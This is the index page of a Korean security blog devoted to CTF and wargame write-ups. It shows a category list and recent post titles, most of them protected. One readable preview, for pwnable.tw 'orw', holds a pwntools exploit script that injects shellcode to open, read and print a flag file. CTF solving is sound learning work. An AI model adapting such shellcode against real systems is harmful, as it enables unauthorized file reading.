포너블은 새벽에

포너블은 새벽에

  • 분류 전체보기 (603)
    • CTF's Write-up (141)
    • Pwnable (35)
      • hackerschool (1)
    • Reversing (0)
    • Web (9)
    • Misc (2)
      • xcz.kr (2)
    • algorithm (153)
      • 기초다지기 (46)
      • dimigo.goorm.io (107)
    • etc... (34)
      • computer (1)
      • 개인공간 (8)
      • 1인1프로젝트 (2)
      • Idea Store (2)
      • Programing (2)
      • 컨퍼런스 (18)
    • WarGame (229)
      • Bandit (35)
      • webhaking.kr (39)
      • LOS (22)
      • pwnable.kr (20)
      • LOB (22)
      • Fedora Core 3&4 (5)
      • exploit-exercises.com-fusio.. (3)
      • CodeEngn (1)
      • Wargame.kr (1)
      • Rootme (48)
      • Reversing.kr (2)
      • cryptohack.org (31)
    • 스터디, 연구, 분석 (0)
  • 홈
  • FACEBOOK
  • GITHUB
  • INSTARGRAM
  • TWITTEER
  • PROFILE
RSS 피드
로그인
로그아웃 글쓰기 관리

포너블은 새벽에

컨텐츠 검색

태그

Crypto m0nd2y hacking HackCTF webhacking 정보올림피아드 rootme 해킹 Bandit 정보보호 정올 보안 cryptohack.org webhacking.kr Linux DreamHack pwnable.co.kr 자가진단 pwnable m0nday

최근글

댓글

공지사항

  • portfolio - m0nday

아카이브

전체 글(603)

  • dreamhack.io - tcache_dup2

    보호되어 있는 글입니다.

    2021.09.03
  • dreamhack.io - web-HTTP-CLI

    보호되어 있는 글입니다.

    2021.09.02
  • dreamhack.io - cpp_string

    보호되어 있는 글입니다.

    2021.09.01
  • pwnable.tw - orw

    쉘코딩 하면 덴다. from pwn import * r = remote("chall.pwnable.tw", 10001) e = ELF("orw") context.log_level = "debug" context(arch='i386', os='linux') pay = "" pay += asm(shellcraft.open('/home/orw/flag')) pay += asm(shellcraft.read('eax', e.bss()+0x100, 100)) pay += asm(shellcraft.write(1, e.bss()+0x100, 100)) r.recv() r.sendline(pay) r.interactive()

    2021.08.31
  • pwnable.kr. - fsb

    보호되어 있는 글입니다.

    2021.08.29
  • pwnable.kr - brain fuck

    보호되어 있는 글입니다.

    2021.08.27
1 2 3 4 5 6 7 ··· 101
티스토리
© 2018 TISTORY. All rights reserved.

티스토리툴바